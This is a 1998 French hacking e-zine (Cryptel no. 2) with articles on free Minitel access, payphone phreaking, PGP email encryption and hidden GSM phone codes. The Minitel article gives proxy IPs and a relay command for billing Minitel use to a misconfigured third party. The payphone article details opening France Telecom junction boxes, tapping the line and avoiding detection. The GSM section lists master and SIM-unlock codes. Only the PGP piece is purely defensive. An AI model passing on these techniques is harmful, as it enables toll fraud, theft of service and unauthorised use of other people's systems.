Copy Link
Add to Bookmark
Report

Cryptel Issue 02

eZine's profile picture
Published in 
Cryptel
 · 20 Aug 2020

  


__ __ _ _ __ ____ __ _
/ _)/ )( | )/ \(_ _)/ _)/ )2
( (_( \ \ /( ()_) )( ( _| (_
\__)\_\_)(_) \_) (_ ) \__)\__)

>> 10110101| <<

e-z-i-n-e

u-n-d-e-r-g-r-o-u-n-d

l-i-b-e-r-a-l-i-s-t-e



EDITION No 2 / Decembre 1998 / © CRYPTEL


> staff: Editeur / vatoo
Ecrivains \ vatoo [vatoo75@altern.org]
\ aaah [Aaah@mail.dotcom.fr]
\ ced99 [ced99@club-internet.fr]
\ cyberjunk [Snipper@hotmail.com]
\ pr0tek [pr0tekti0n@hotmail.com]

________________
>> Avertissement:

L' organisation CRYPTEL a écrit ce texte dans
le but UNIQUE d' informer les gens. Ces quelques lignes
codées par des 1 et des 0 ne sont donc qu' à prendre d' un
point de vue éducatif. Ce texte n' est pas illégal, c' est
son application qui l' est, alors soyez sérieux, ne le
mettez pas en pratique, car vous pourriez être poursuivis en
justice et nous ne serions pas responsables de vos actes. L'
information n' a jamais tué personne. Les actes, si.


__________
>>Sommaire:

_________ ________ ____
/ article \_______________________/ auteur \_____/ Ko \___
|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
| 2.1 Edito vatoo 3 |
| 2.2 Minitel gratuit aaah 5 |
| 2.3 Phreak cabines FT aaah 5 |
| 2.4 Email & securite pr0tek 22 |
| 2.5 Secrets of 30 GSM vatoo 25 |
| 2.6 Introduction a Win NT cyberjunk 19 |
| 2.7 Prefixes nationaux vatoo 3 |
| 2.8 Password files aaah 4 |
| 2.9 Elephant bleu ced99 4 |
| 2.10 GSM a la loupe vatoo 15 |
| 2.11 Trashing reports aaah 12 |
| 2.12 Paris Underground vatoo 24 |
| 2.13 Ze End vatoo ? |
|__________________________________________________________|
'¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯'


______________
2.1>>Editorial:

Decembre 1998...a l' aube de l' an 2000! Et dire que dans quelques jours,
nous allons passer en 1999, numero qui marque les esprits, meme les plus
incredules. Comment rester indifferent face a ce que represente le futur
passage de millenaire? C' est un changement purement psychologique, mais
deja, l' arrivee en 1999 va nous faire prendre conscience que notre
societe n' est pas a la hauteur de notre epoque. Les francais vont devoir
changer d' etat d' esprit, ne plus rester les conservateurs franchouillards
qu' ils ont ete jusqu' a present.
Le temps est venu a la vulgarisation des technologies (comme le net, un peu
nouveau pour les francais, alors qu' il existe depuis presque 40 ans!),
avec un droit a l' information plus important pour le citoyen.
La lutte contre le fascisme et l' intolerance vont etre decisives pour
l' avenir de notre societe. Si les conditions de vie ne plaisent pas plus
aux francais, la montee du FN va continuer jusqu' a ce qu' il soit trop
tard pour faire marche arriere. C' est a present qu' il faut reagir, et
se battre pour ses ideaux. Soyez pour la liberte d' expression, la tolerance,
et montrez-le au quotidien. Il faut se dire que ce n' est pas en attendant
la reaction des autres que la situation va changer. Le Nouveau Digital
Underground Francais est la pour soutenir cette position, surtout dans les
moments les plus delicats.

Passons a des choses un peu moins serieuses: la deuxieme edition de notre
ezine, que vous tenez entre vos disques durs. Notre equipe a essaye de
faire un mag encore plus complet et plus precis pour satisfaire votre soif
cannibale de connaissances. Je dirais meme qu' on s' est bien dechires
pour vous fournir ce numero. Nous avons essaye de rester originaux, et ne pas
remixer des articles deja traites de nombreuses fois. Cela va d' une visite
des catacombes parisiennes au phreak de cabines FT(exclu), en passant par
les secrets de 30 GSM, ou bien encore le trash d' une agence FT.
Vous avez surement remarque que des auteurs sont apparus, comme Le Saint
(alias Cyberjunk), ced99 ou pr0tek. En fait ils ont ecrit pour le #2 en tant
qu' auteurs ponctuels (mis a part ced), et peuvent apparaitre encore dans les
editions a venir, ca ne depend que d' eux.

On souhaite sincerement que ce numero vous apporte quelque chose. Nous sommes
toujours tres interesses par vos creations (articles, scans de pbx, vmb, passwords,
ou autres delires..). On attend aussi vos reactions, vos critiques, vos injures sur
ce file, et eventuellement vos remerciements!

En tout cas, toute l' equipe de CRYPTEL exige que vous passiez un reveillon du
jour de l' an terrible a ne pas vous en remettre pendant 3 jours, si vous voyez
ce que je veux dire ;)


(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Minitel GRATOS ?! ) 2.2 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


En lisant les newsgroups j'ai trouvé un post assez interressant sur le minitel
la technique semble valide et FT est parait il au courant du problème. Si j'ai
plus d'infos vous cryptel vous en serez informé :

Ça y est, c'est confirmé, on peut avoir le minitel gratuit (communications
incluses) grâce à France Telecom Interactive (la boîte qui s'occupe de Wanadoo &
compagnie). La démarche est très simple, mais nécessite tout de même du logiciel
(UNIX me paraît particulièrement adapté ;)
Le principe : FTI permet à ses abonnés d'avoir accès au minitel via Internet
moyennant un petit abonnement. L'heureux abonné, quand il se connecte au serveur
web de wanadoo (www.wanadoo.fr ) voit alors apparaître une rubrique Minitel, et
tous les frais normalement reversés au prestataire de service seront débités sur
une petite note qui viendra avec la facture Wanadoo pour l'abonnement à Internet.

Hum, mais comment cela marche-t-il? Pourquoi certains ont-ils cette rubrique
Minitel et pas d'autres? Le serveur Web wanadoo "sait" quelles sont les adresses
IP pouvant accéder à un service, et lesquelles n'y ont pas droit.
Là où ça devient intéressant, c'est que certaines boîtes, trop heureuses d'avoir
le Turbowanadoo (le nom de la formule ADSL "internet rapide"), veulent pouvoir
en profiter depuis tout le réseau local. Et, sur le conseil de FTI (j'insiste sur
ce point), elles installent Wingate (les techniciens de chez FTI connaissent mal
Linux, de leur propre aveu, et Wingate a le mérite d'être bon marché).

Préparez les mouchoirs, car par défaut (et les valeurs par défaut ne sont pas
changées dans 90% des cas), Wingate offre un service de redirection telnet
absolument merveilleux. Pour s'en convaincre, essayez de faire un petit "telnet
193.252.178.17"
. A l'invite Wingate, tapez (par exemple) "nephtys.lip6.fr 23".
Nous sommes alors connectés au service ftp de jussieu, mais en passant par le
Wingate. Jussieu a l'impression que c'est la machine hébergeant le Wingate qui
appelle.

Bien. Le proxy http des ADSL est 193.252.178.5, port 8888. Il reste donc à écrire
un petit programme qui, recevant une connexion sur le port (mettons) 3000, va
contacter 193.252.178.17, et entrer la chaîne de caractères "193.252.178.5 8888"
et ensuite, se contenter de faire la FIFO entre le flux de la connexion entrante
sur le port 3000 et le flux de la connexion sortante vers le Wingate. Je suggère
l'utilisation des outils "hose" et "faucet", qui redirigent des sockets TCP/IP
vers les entrées/sorties standard. La ligne à taper ressemblera à "hose 3000 -c sh
faucet 193.252.178.17 (echo 193.252.178.5 8888 ) -slave -in -out"
... bon je n'ai
pas mes manpages sous la main, c'est assez proche.

On lance cette commande sur une bécane (disons toto). Ensuite, dans votre brouteur
favori, à la ligne "proxy", mettez l'adresse toto, port 3000. Et zou. Maintenant,
vous accédez à Internet, mais exactement comme si vous étiez sur la machine
hébergeant le Winproxy. Le proxy de chez FTI croira que l'appel vient de la bécane
du Winproxy, et autorisera donc l'accès au minitel.

Bon, le seul "hic" c'est que si ça se trouve, je vous ai donné l'adresse d'un
Winproxy qui n'a pas pris l'option Minitel. Qui sait? En tout cas, la technique ne
se restreint pas aux lignes ADSL, les accès PPP standard peuvent eux aussi être des
cibles.

-=-
Aaah@mail.dotcom.fr



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Phreak cabine FT ) 2.3 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


Mardi 14 Octobre je suis dans une cabine téléphonique entrain de téléphoner
(non sans blagues ? ;-) mes clés tombent par terre, je m'accroupis pour les
ramasser et là au surprise je remarque le jackpot

----------------------------------
| |
| |
| |
| */Voir Photo cabine.jpg*/ |
| |
| |
| |
----------------------------------

Et oui il est là :-) tout bête et sous nos yeux. C'est une boitier en fer fermé
par 2 points : un en haut et un en bas. Pour ouvrir ce boitier 2 manieres s'ouvrent
à toi :

* Tu es un bourrin, prenez une pince CROCO et essayer de forcer
* Tu fais dans la finesse et le raffinement, tu achetes une clé passe
EDF/GDF attention ce type de clé ne se trouve que dans les bonnes
quincailleries (70 frs environ) inutile de te pointer chez
CASTORAMA ou autres et demander ce type de clé ... Voilà à quoi ça
ressemble

----------------------------------
| |
| |
| |
| */Voir Photo cle.jpg*/ |
| |
| |
| |
----------------------------------

Moteur.... ACTION ! Voilà maintenant comment je te conseille de procéder. Prends
un sac à dos et met z'y un téléphone tout bete avec sa prise dénudé (cad vous
virez l'embout il ne faut garder que le fil) un petit tournevis plat, la pince
croco ou le passe EDF et partez en quête d'un cabine FT isolé (pas sur les champs
élysées). Une fois dedans tu ouvres la boite (tous tes instruments sont cachés dans
le sac à tes pieds) et voilà ce que tu trouves

----------------------------------
| |
| |
| |
| */Voir Photo boitier.jpg*/ |
| |
| |
| |
----------------------------------

La première chose que tu fais tu coupes le disjoncteur comme ça la lumière de la
cabine sera éteinte tu seras plus au calme pour opérer et moins exposer aux regards.
Ensuite la partie qui nous interresse c'est celle avec les fils de plusieurs couleurs
raccordée a plusieurs bouts rouges. A partir de là tu es un grand garçon tu prends
ton téléphone, ton tournevis et tu fous les fils de ta ligne tel dans ce de la cabine.
Respecte bien les couleurs. Une fois fait bah BINGO tu as un tel gratos raccordé a une
ligne France Telecom tu détournes une grosse boîte plutôt qu'un pauvre particulier
c'est bien mieux. Un autre débouché s'ouvre à toi tu fous une black box et on t'appelle
gratos sur une ligne propre à FT donc tu t'en fous des moins de 4 min puisque meme si
les commutateurs reperent la couille ils vont surveiller leur propre ligne :-) lol.


Quelques remarques en VRAC :
****************************
@ Le contenu des boitiers varie celon le type de cabine. Tu peux tomber sur un type
de boitier avec un cache pot gris qui protège le raccordement pour l'ouvrir 2
solutions : tu l'arraches (mais ça craint un peu ...) tu essayes de déviser la vis
qui est en fait un minuscule point, pour ça tu prends une pointe de clou tu enfonces
bien et tu dévises ... NB: Ce type de boitier est quand meme rare.

@ Changer régulièrement de cabine on ne sait jamais

@ Pour savoir si quelqu'un a ouvert le boitier suite à votre passage mettez avant de
partir un petit bout de scotch sur la fente du boitier comme ça si a votre prochain
passage il n'y est plus c'est que quelqu'un est passé par là ...

-=-

Si quelqu'un fait du lock picking, possede des passes france telecom (cabine, répartiteur,
etc...) je suis TRES interressé mailez-moi Aaah@mail.dotcom.fr On compte sur vous car on
va pas tout faire nous même, participez c'est cool et on est ouvert à toutes vos
propositions.



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Email & securite ) 2.4 ( pr0tekti0n@hotmail.com (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


Ce texte est réservé aux personne ayant de grandes connaissances dans le domaine "Internet".


Introduction

Avec l'utilisation toujours croissante du courrier électronique (E-Mail) comme mode de com-
munication sur Internet ainsi que d'autres services, la sécurité de ce type de courrier devient
de plus en plus importante. De nombreux utilisateurs se posent des questions telles que:

Q: Peux-on intercepter le courrier électronique ?

R: Oui, l' E-mail n'est pas sur. Il est possible d'intercepter des messages éléctroniques.

Q: Peux-on envoyer du courrier électronique sous un faux nom ?

R: Oui, toute personne peux masquer son identité sur le Net.

Internet et les services de courrier électronique que l'on peux y trouver ne sont pas surs!
A travers ce document, vous pourrez découvrir pourquoi les services mail ne sont pas surs et
comment y remédier.

1) Les E-Mail privés.

Imaginons que vous vous serviez du courrier électronique pour envoyer des messages dans une
entreprise. Il se pourait qu'au cours de cette courte correspondance, vous échangiez des
détails intimes (je sais pas moi, une déclaration d'amour :) ). Votre employeur n'aurait
aucune difficulté à les lire...
Tenez-vous réellement à ce que votre employeur soit parfaitement au courrant de votre vie
privée?
Si c'est non (enfin j'espere), il est nécessaire que vous protégiez vos lettres des regards
indiscrets.

2) Probleme de sécurité.

Les informations transmises par courrier électronique sur Internet le sont en texte clair.
Ces textes sont stockés sur n'importe quel ordinateur Internet. Ils sont tenus à la disposition
du destinataire pour qu'il les recoive sur simple demande. Voila pourquoi les personnes
indiscretes disposent de multiples occasions pour lire les messages d'autres utilisataires.
En fait, ces "voyeurs" doivent accéder à des parties déterminées sur un réseau:

- Le courrier électronique est la plupart du temps transmis via le SMTP (simple mail transfert
protocol). Lors de cette transmission, des paquets de données sont envoyées sur un réseau
(Internet).
Tres souvent, l' E-Mail n'est pas directement transmis au destinataire mais sauvegardé
temporairement.
Votre E-Mail restera un certains temps sur un serveur, en clair!
C'est bien sur à ce moment là que les messages peuvent etre lus et copier par des responsables
du serveur ou par des hackers.
On pourrait se demander alors si des messages sont lus sur Internet et combien...

3) Identification.

Bien que tous les E-Mail disposent d'une adresse d'expéditeur, cette information n'est pas
fiable!
Il est facile de s'amuser à envoyer des messages sous un faux nom (ceci est expliqué dans de
nombreux zine de hacking tels Frhack, allez sur www.multimania.com/gripsou/ ).
Suivre des messages reste possible jusqu'à un certain point.
Quand une communication est transmise via divers ordinateurs, c'est à peine si l'on sait
réellement d'ou elle vient à l'arrivée.
Il est donc presque impossible de distinguer si un E-Mail est, dans l'état présent, un original
ou ce que l'on pourrait appeler "falsification".

4) Codage d' E-Mail.

Il existe de nombreux systemes de codage qui permettent, jusqu'à un certain point, de garantir
fiabilité et authenticité. En fait, aucun programme ne peut à ce jour garantir 100 % de
sécurité.
Dans le cas le plus simple, l'expéditeur et le destinataire s'accordent sur une "clé"
déterminée.
De tels procédés que si vous disposez d'un moyen de communication sur pour vous mettre d'accord
sur une clé (ne faite pas ca sur IRC), et notre bon vieux téléphone n'est pas plus sur qu'une
lettre...

5) Systeme à clé publique.

Puisqu'il est rare de trouver une voie de communication sure, d'autre procedés de codage
permettant la transmition de la fameuse clé sont tres souvent utilisés de nos jours. Chaque
utilisateur crée deux clés: La premiere est communiquée de facon "publique". Grace à cette clé
toutes les autres personnes chiffrent le courrier destiné à un correspondant.
Ce n'est qu'avec la seconde clé perso que le correspondant pourra déchiffrer son courrier:
C'est la raison pour laquelle cette clé personnelle doit etre secrete.
Voici un shema, je ne suis pas tres fort en dessin...



|------------|
| Expéditeur |________________________________________________ --------------
|----------- | |Destinataire|
| --------------
------------- _________________________________________________|
| Fichier | | |
------------- CLE |
| | |
| | |
| | |
------------ | |
| Envois |________| |
------------ |
| |
| ---------- ---------- |
|___________________|Internet|_____| Envois| __________________|
---------- ----------


6) PGP

PGP- Pretty Good Privacy est le systeme à clé publique le plus répendu. Il permet:

- De coder des lettres.

- De les signer électroniquement.

Une signature életronique garantit qu'un courrier a réellement été rédigé par une personne
déterminée.
Pour vérifier l'authenticité d'une signature, le destinataire utilise pour le décodage la clé
publique.
Si le déchiffrage du courier ne peux etre effectué; cela signifie que le message a été
manipulé.

7) PGP suite

A partir d'un message que l'on aura signé, on crée un "extrait" ayant les caractéristiques de
ce message.
Cet "extrait" est ensuite codé à l'aide de la clé et transmis avec le courrier si le
destinataire veut vérifier l'authenticité de la signature, il doit déchiffrer l'extrait
codé au moyen de la clé publique de l'expéditeur et doit créer un autre extrait (et oui...)
du courrier lisible. Si les deux extraits se recoupent, l'authenticité du courrier et
démontrée.
Cette methode, disponible dans PGP (le logiciel), permet aux utilisateurs ne possédant pas
PGP (oui et ils ne sont pas rares :( ... )de lire des courriers signés.

8) Clé PGP.

Bien que les possibilités de PGP présentées ici nous permettent déjà de coder et de signer des
messages, d'autres questions se posent. La premiere concerne la maniere dont une personne peut
faire parvenir un message chiffré à un autre utilisateur avec lequel elle n'a encore aucun
contact... il ne faut pas oublier que la clé doit rester secrete...
Prennons un exemple:

Une personne A boudrait communiquer avec une peronne B qu'il ne connait pas encore.
Si A voulait communiquer avec B, il lui demanderait d'abord sa clé publique.
Et si une personne C pouvait intercepter ce message et envoyer à la place de B, une réponse
avec une fausse clé, C serait alors le seul à pouvoir lire ces lettre.
A penserait communiquer avec B alors qu'elle communiquerait avec C...
Comment peut on alors reduire cette possibilité d'aggression ?

9) Serveur de Clé.


______________ ______________ _______________
| | | | | |
| Personne A | | Personne B | | Personne C |
|____________| |____________| |_____________|
| | |
| | |
| | |
_______|__________ | ___|
| | _______|___________ _______|___________
| Clé publique | | | | |
|_________________| | Clé publique | | Utilisation de |
| |_________________| | la clé de A |
| | |_________________|
| _______________________| |
|___________| |
_______|__________ |
| | _______|__________
| Acces Internet | | |
|________________| | Acces Internet |
| |________________|
| | |
| | |
_______|__________ | |
| |______________________________________| |
| Serveur Clé | |
|________________|_________________________________________________|
| |
| Clé publique |
|_________________|



Les serveurs de clés sont des ordinateurs d'acces public, qui recuillent des clés publiques et
qui les envoient sur demande (sympas non ?). Toute personne peut donc y trouver des clés
publiques des autres utilisateurs (seulement si ils sont enregistrés).

Les serveurs de clés pourraient pour etre pris en otage par des hackers, ne l'oublions pas...


10) La "chaine" de confiance.

Le principe sur lequel elle est fondée est le suivant: des personnes qui se connaissent ou
bien, qui sont sure de l'existence réelle de l'autre, signent leur clés publiques.


______________ ______________
| | Confiance | |
| Personne A |-----------------><------------------| Personne B |
|____________| :) |____________|
| |
| |
| |
______|_______ ________|______
| | ________________ | |
| Clé privée |___________| |_______| Clé publique |
|____________| | Logiciel PGP | |______________|
|______________|


La signature d'une clé correspond à celle d'un message. Si B désire signer la clé publique
de A, alors il la code avec sa propre clé privée.

Une chaine de confiance est crée quand de nombreux utilisateurs PGP signent entre eux des clés
publiques.

11) "Empreintes digitales".

Toute clé publique PGP sera clairement marquée d'une "empreinte digitale". Une telle empreinte
est aussi unique que chaque clé. Elle permet d'attribuer de maniere fiable une clé PGP à une
personne. Par exemple, si une personne vous transmet son empreinte digitale, vous serez certain
que la clé est bien la sienne. Il faut bien sur que la personne puisse vous envoyer ses
empreintes digitales :) ...

12) Sécurité avec PGP.

La fiabilité de codage tel que PGP repose sur l'importance des moyens que devrait employer un
agresseur pour calculer la clé privée. En effet il existe des "cracker PGP", vous pourrez vous
en procurer tres certainement sur http://neworder.box.sk
Sachez qu'il aura fallu 8 mois à une organisation pour cracker une telle clé...
Ceci devrez vous donnez une idée des moyens qu'il faudrait utiliser pour casser une clé...

13) Logiciels PGP (enfin!).

Il existe différentes versions de PGP:

- Des versions non commerciales pour un usage aux Etats-Unis et le Canada UNIQUEMENT.

- Des versions commerciales pour les E-U et le Canada.

- Des versions internationnales non commerciales.

L'utilisation de PGP est à priori illégale car:

- L'un des deux procédés de cryptographie employé dans PGP, à savoir RSA, ne peux etre utiliser
qu'aux Etats-Unis.

- En Europe, l'usage non commercial de PGP est normalement possible puisque le code source
RSA a été exporté illégalement des Etats-Unis.

14) Installation de PGP sous DOS!


PGP est autant un programme exécutable dispo pour de nombreux sytemes en source C.
Si vous téléchagez un programme PGP, vous aurez les fichiers suivants:

______________________________________________________________________________________________
| | |
| Nom du fichier | Contenu du fichier |
|_________________|__________________________________________________________________________|
| | |
| pgp.exe | Programme exécutable |
|_________________|__________________________________________________________________________|
| | |
| config.txt | Fichier de configuration pour PGP |
|_________________|__________________________________________________________________________|
| | |
| setup.doc | Remarques sur la config de PGP |
|_________________|__________________________________________________________________________|
| | |
| pgpdoc1.txt | La doc officielle de PGP |
|_________________|__________________________________________________________________________|

Lisez premierement toutes les infos des fichiers txt et doc.
Ajoutez ensuites ces lignes dans votre fichier autoexec.bat:

SET PGPPATH=C:le_rep_ou_vous_avez_mis_PGP
SET PATH=C:le_rep_ou_vous_avez_mis_PGP;%PATH%
SET TZ=MET-1DST

TZ correspond à Time Zone.


Info sur le config.txt

Dans le tableau suivant, vous trouverez les parametres importants:

______________________________________________________________________________________________
| | |
| Parametre | Remarque |
|______________________|_____________________________________________________________________|
| | |
| MyName = "Dupond" | Vous devez bien sur mettre votre nom |
|______________________|_____________________________________________________________________|
| | |
| Language = fr | Langue à choisir |
|______________________|_____________________________________________________________________|
| | |
| Armor = on | Activer le PGP pour coder vos e-mail |
|______________________|_____________________________________________________________________|

Si vous désirez utiliser PGP sur un autre syteme, lisez bien le CONFIG.TXT.

15) PGP "Keyrings".

PGP utilise deux fichiers pour la mémorisation des clés: pubring.pgp et secring.pgp
Il inscrit les clés publiques de vos correspondants dans le pubring.pgp . Ce fichier n'est pas
"sensible". En revanche le secring.pgp est TRES important puisque c'est dedant qu'est inscrite
votre clé privée!
Mettez donc plutot ce fichier sur disquette que vous conserverez en lieu sur.
Vous devez aussi protéger le fichier randseed.bin qui est aussi important.

Des que vous aurez paramétré PGP et protégé vos petits fichiers, vous pourrez commencer à
utiliser PGP.

16) Déduter.

Q: Comment créer une clé personnelle ?

R: tapez: "pgp -kg" le programme vous demandera aussi la longeur de la clé:

Pick your RSA key size:
1) 512 bits- Low commercial grade, fast but less secure
2) 768 bits- High commercial grade, medium fast, medium speed, good security
3) 1024 bites- "Military" grade, slow, highest security
Choose 1, 2 or 3 enter desired number of bits:

Je vous conseille de prendre le 2), une clé normale, bien que le 1) soit suffisant.
Un identificateur de clé vous sera demandé:

You need a user ID for your public key. The desired form for this
user ID is your name, fallowed by your E-mail adress enclosed in
ngle brackets, if you have an E-mail adress.
For example: Daniel, Dupond .dupond@cool.fr
Enter a user ID for your public key:

Et maintenant le mot de passe:

You need a pass phrase to protect your RSA secret key.
Your pass phrase can be any sentence or phrase and may have many
words, spaces, punctuation, or any other printable characters.
Enter your phrase here:

ATTENTION: Ce mot de passe est tres important pour la protection de votre clé!

Apres le mot de passe on vous demande de tapez n'importe quoi:

We need to generate 968 random bits. This is done by measuring the
time intervals between your keystrokes. Please enter some random text
on your keyboard until you hear the beep:

Vous avec maintenant créer votre clé, entrez ceci pour avoir des infos sur votre clé:
"pgp -kvvc"

Vous obtiendrez:

Key ring:"pubring.pgp"
Type Byte/KeyID Date UserID
pub 1024/DDB189E1 1998/12/24 Test-Key for Daniel Dupond
Key fingerprint = 54 6D C8 D4 98 F9 A3 55 55 AE 1A 69
sig DDB189E1 Test-Key for Daniel Dupond
1 matching found

17) Comment crypter et décrypter des messages.

Créez d'abord le fichier que vous voulez crypter. Ex: test.txt

Pour le codage tapez:
"pgp -eat test.txt"
Vous obtiendrez un fichier test.asc

Pour le décryptage tapez:
"pgp -d test.asc"


18) Les autres commandes PGP.

______________________________________________________________________________________________
| | |
| Fonction PGP | Commande |
|______________________|_____________________________________________________________________|
| | |
| Codage d'un texte | pgp -e{fichier texte} {ID du destinataire} |
| avec la clé du dest. | |
|______________________|_____________________________________________________________________|
| | |
| Signature | pgp -s{fichier texte} [-u {votre ID}] |
|______________________|_____________________________________________________________________|
| | |
| Décodage d'un texte | pgp {fichier codé} [-o {fichier texte lisible}] |
| avec examen de la | |
| signature | |
|______________________|_____________________________________________________________________|


19) Source PGP et sites Internet

Serveur officiel: ftp://ftp.pgp.net/pub/pgp
Bon site en anglais bien sur: http://www.pgp.com
Et bien sur en fancais:
http://www.yahoo.fr/Informatique_et_multimedia/Securite_et_cryptage/Pretty_Good_Privacy__PGP_/


20) Fin !!!

Voila c'est tout, si vous désirez plus d'information ou de l'aide, n'hésitez pas à m'envoyer
un mail!

|Pr0teK|




(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Secrets of 30 GSM ) 2.5 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


______________________
Alcatel One Touch Easy

Entrez 000000 et pressez *.
Le menu secret apparait.

TRACES Menu d' indicateurs de canaux
ARRETS - ?
VIDER ARRETS Pressez OK et le cell repond: 'This action is executed!'
CTRL CHARGE Montre la tension du chargeur et de la batterie.
DAMIER affiche le test.
Le Master Code pour le "MENU Code" et "Prod. code" de l' Alcatel One
Touch Easy est 25228353.
La plupart des telephones ALCATEL sont 'SIM Locked', ils ne peuvent donc etre
utilises qu' avec une certaine tonalite. Ca ne peut etre desactive qu' en
obtenant le code special par Alcatel, ou par votre fournisseur d' acces.
Il y a une rumeur komme koi un programme permettant de calculer le code a
partir de l' IMEI, trainerait sur le net ;)

IMEI: 3300 1453 1139 420
Lorsqu' un cell est active avec une carte, ca donne:

"PRODUCT CODE"
"VAL. => OK"
Puis on entre 025121992, OK
"ENTER SPECIAL CODE"
**05* comme avec Motorola
"UNBLOCKING"
" PUK ? "
10608CC2*. Les 2 suivants fonctionnent aussi: 906081C2* 15900807*
"UNBLOCKING"
" PIN ? "
0000*
"UNBLOCKING"
"PIN AGAIN "
0000#

____________
ERICSSON 198

*#06# pour voir le numero IMEI

________________
ERICSSON 218/337

*#06# pour voir le numero IMEI
-> * <- <- * <- * CLR pour voir la version du software.
<- * * <- Pour activer la localisation de l' operateur (a utiliser avec precaution).
Il y a 5 essais pour y parvenir. Au dernier essai, le telephone beep pour avertir
ke c' est le dernier essai..Un mauvais code vous fait sortir du menu, et vous aurez
'Not allowed' inscrit sur le cadran. Un mode de test secret est accessible sir le
GH337. Il y a deux methodes:
> * < < * > * montre la version du soft, comme 940810 1310
> * < < * < * montre la version du soft, comme 951024 1054
Apres etre entre dans ce mode, vous pouvez vous ballader avec les fleches < et >
dans le menu. Chaque menu est different e fonction du type du software.

Commandes pour la version 940810 1310 :
TEXT CHECK - Montre 254 messages dans le langage courant
INIT EEPROM MMI - Initialise la configuration de l' utilisateur

Pour les versions plus recentes:
FLASH - Redemarre le telephone au moment ou l' on entre le numero de PIN.

Commandes pour la version 950626 1405 :
CXC (numero) - Le numero de production du soft. Le GH337/GF337 est toujours "CXC 125 005"
PRG - Indication pour la programmation

________________
ERICSSON 318/388

*#06# pour voir le numero IMEI
-> * <- <- * <- * CLR pour voir la version du software.

Pinout du GA628:
1: Chargeur.
2: Entree Serie.
3: GND
4: Sortie Serie.
5: Sortie +5V ? Sources au-dessus de 100 mA.
6: Entree Digitale.
7: Sortie Digitale. Haute lors de l' appel.
8: Permet le micro et l' ecouteur externes, a connecter a un GND.
9: GND
10: Permet le micro et l' ecouteur externes, a connecter a un GND.
11: Microphone externe.
12: Haut-parleur externe, tres petit signal (10 mV).

Commandes d' Edition
AT+GMI Identification du fabricant
AT+GMO Identification du modele
AT+GMR Identification de la derniere revision
AT+GMM
ATDxxx; Appeler le numero xxx
ATH Raccrocher le cell
AT+CFUN=? Definir les niveaux de fonctionnalite dans l' ordre de consommation d' energie.
AT+CBC Voir le niveau de la batterie.


Caracteres SMS
b7 0 0 0 0 1 1 1 1
b6 0 0 1 1 0 0 1 1
b5 0 1 0 1 0 1 0 1
b4 b3 b2 b1 0 1 2 3 4 5 6 7
0 0 0 0 0 SP D SP 0 @ P ¿ p
0 0 0 1 1 £ SP ! 1 A Q a q
0 0 1 0 2 $ F " 2 B R b r
0 0 1 1 3 ¥ G # 3 C S c s
0 1 0 0 4 è L $ 4 D T d t
0 1 0 1 5 é W % 5 E U e u
0 1 1 0 6 ù P & 6 F V f v
0 1 1 1 7 ì Y ' 7 G W g w
1 0 0 0 8 ò S ( 8 H X h x
1 0 0 1 9 Ç Q ) 9 I Y i y
1 0 1 0 10 LF X * : J Z j z
1 0 1 1 11 Ø SP + ; K Ä k ä
1 1 0 0 12 ø Æ , < L Ö l ö
1 1 0 1 13 CR æ - = M Ñ m ñ
1 1 1 0 14 Å ß . > N Ü n ü
1 1 1 1 15 å É / ? O § o à

Notes:
SP Espace
LF Line feed
CR Carriage return

Menus caches
Allez dans 'MissedCall'
Pressez la fleche -> pendant une sec ou 2
Le Menu d' options s' affiche
Choisissez 'Yes'.

Essayez de taper ca: >*<<*<*
ou < est la fleche gauche et > la fleche droite

______________
ERICSSON GA628

*#06# pour voir le numero IMEI
-> * <- <- * <- * pour voir la version du soft
-> * <- <- * <- * -> pour lire tous les textes programmes
< * * < pour voir le status du reseau (attendre 3 s)
0 # pour appeler le dernier numero compose
* # 0 0 0 0 # pour initialiser le menu en anglais
Pour voir le niveau de la batterie quand le cell est eteint, pressez rapidement on/off.
Pour voir les menus supplementaires (sur les versions les + anciennes), allez dans les
appels non-aboutis, empty directory, pressez et maintenez la touche flechee droite, et
choisissez le type de menu.
Pour voir les menus supplementaires (sur les versions les + recentes), allez dans READ,
empty directory, pressez et maintenez le touche flechee gauche, et choisissez le type de
menu.
Pour editer le book de votre cell, allez dans le menu supplementaire, et choisissez
"
EditPh.Bk".

Comment utiliser le menu - (dans les menus supplementaires)

Choisissez 'Yes' puis on va vous demander - EditMenus? -, choisissez 'Yes'
Si le menu clignote, il n' est pas en marche.
S' il ne clignote pas, il est en service.
Vous pouvez le mettre en service ou non en choisissant 'Yes'.
Lorsque vous mettez en place un menu, vous pouvez choisir sa position.
Lorsqu' il demande l' accord, choisissez 'Non', et si la fleche est -> ,
il dit la position par la fleche droite, vous pouvez la changer en pressant '*',
ainsi vous instaurez la place du menu en donnant le numero de la place du menu comme
ca: si votre celle inscrit "
Store->2", le menu ke vous avez selectionne reste sur
la deuxieme fleche a droite!
